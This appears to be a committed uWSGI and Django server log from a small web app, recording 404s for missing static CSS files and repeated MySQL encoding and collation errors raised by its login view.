+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 733/967] 180.160.72.163 () {38 vars in 840 bytes} [Thu Jan 14 08:32:49 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 734/968] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 08:32:49 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 735/969] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 08:32:49 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 736/970] 180.160.72.163 () {38 vars in 804 bytes} [Thu Jan 14 08:32:49 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 27 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 737/971] 180.160.72.163 () {38 vars in 880 bytes} [Thu Jan 14 08:32:49 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 738/972] 180.160.72.163 () {38 vars in 772 bytes} [Thu Jan 14 08:32:49 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 739/973] 180.160.72.163 () {38 vars in 770 bytes} [Thu Jan 14 08:32:49 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 740/974] 180.160.72.163 () {40 vars in 896 bytes} [Thu Jan 14 08:32:50 2021] GET /kind-manage/? => generated 7353 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 741/975] 180.160.72.163 () {48 vars in 979 bytes} [Thu Jan 14 08:32:50 2021] POST /kind-manage/? => generated 27 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 2069|app: 0|req: 742/976] 180.160.72.163 () {38 vars in 836 bytes} [Thu Jan 14 08:32:50 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 743/977] 180.160.72.163 () {38 vars in 804 bytes} [Thu Jan 14 08:32:50 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 744/978] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 08:32:50 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 745/979] 180.160.72.163 () {38 vars in 840 bytes} [Thu Jan 14 08:32:50 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 746/980] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 08:32:50 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 747/981] 180.160.72.163 () {38 vars in 848 bytes} [Thu Jan 14 08:32:50 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 21 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 748/982] 180.160.72.163 () {38 vars in 880 bytes} [Thu Jan 14 08:32:50 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 749/983] 180.160.72.163 () {38 vars in 772 bytes} [Thu Jan 14 08:32:50 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 750/984] 180.160.72.163 () {38 vars in 770 bytes} [Thu Jan 14 08:32:50 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[]
+[pid: 2069|app: 0|req: 751/985] 180.160.72.163 () {40 vars in 889 bytes} [Thu Jan 14 08:32:54 2021] GET /all-3-0-0 => generated 8232 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 2069|app: -1|req: -1/986] 180.160.72.163 () {38 vars in 760 bytes} [Thu Jan 14 08:32:55 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/987] 180.160.72.163 () {38 vars in 758 bytes} [Thu Jan 14 08:32:55 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 2069|app: 0|req: 752/988] 180.160.72.163 () {40 vars in 1056 bytes} [Thu Jan 14 08:33:24 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 2069|app: -1|req: -1/989] 180.160.72.163 () {42 vars in 1128 bytes} [Thu Jan 14 08:33:25 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/990] 180.160.72.163 () {42 vars in 1134 bytes} [Thu Jan 14 08:33:25 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE5\\xB9\\xB2\\xE9\\xA5\\xAD...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE5\\xB9\\xB2\\xE9\\xA5\\xAD...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 753/991] 180.160.72.163 () {48 vars in 1161 bytes} [Thu Jan 14 08:33:38 2021] POST /login/ => generated 209951 bytes in 108 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x9C\\x80\\xE5\\xBC\\xBA...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x9C\\x80\\xE5\\xBC\\xBA...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 754/992] 114.87.230.234 () {48 vars in 1161 bytes} [Thu Jan 14 08:33:57 2021] POST /login/ => generated 209870 bytes in 122 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 233, in login
+ if len(models.User.objects.filter(uid=uid, password=pwd)) != 0:
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__
+ self._fetch_all()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all
+ self._result_cache = list(self._iterable_class(self))
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__
+ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+[pid: 2069|app: 0|req: 755/993] 114.87.230.234 () {48 vars in 1161 bytes} [Thu Jan 14 08:34:04 2021] POST /login/ => generated 183377 bytes in 145 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x9C\\x80\\xE5\\xBC\\xBA...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
